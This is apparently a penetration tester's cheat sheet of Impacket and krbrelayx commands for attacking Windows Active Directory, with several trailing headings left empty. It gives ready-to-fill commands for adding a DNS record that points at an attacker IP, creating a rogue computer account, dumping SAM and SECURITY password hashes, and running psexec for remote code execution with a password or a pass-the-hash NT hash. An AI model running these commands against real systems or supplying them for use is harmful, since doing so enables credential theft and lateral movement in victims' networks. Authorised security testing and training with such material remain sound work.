Impacket

Collection of useful impacket commands common in engagements.

Add DNS record

# Clone the following repo first (dnstool.py ships with krbrelayx): https://github.com/dirkjanm/krbrelayx/tree/master
python3 dnstool.py -u <domain\username> -p <password> -a add -r <ns-record> -d <attacker-ip> <dc-ip>

# Check that the record has been added
python3 dnstool.py -u <domain\username> -p <password> -a query -r <ns-record> -d <attacker-ip> <dc-ip>

Add computer account

impacket-addcomputer -dc-ip <DC-IP> -computer-name <COMPUTER-NAME>$ -computer-pass '<PASSWORD>' '<DOMAIN-FQDN>/<USERNAME>:<PASSWORD>'

Dump local hashes with secretsdump

# Dump SAM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Dump SECURITY
impacket-secretsdump -security SECURITY -system SYSTEM LOCAL

RCE with psexec

# With a password
impacket-psexec <domain>/<username>:'<password>'@<target>

# With a hash (-hashes takes LMHASH:NTHASH; the LM half may be left empty before the colon)
impacket-psexec <domain>/<username>@<target> -hashes <lm-hash>:<nt-hash>

SMBclient

MSSQLclient

Get a list of all AD users

Dump SAM and SYSTEM using registry

Enumerate Group Policy passwords
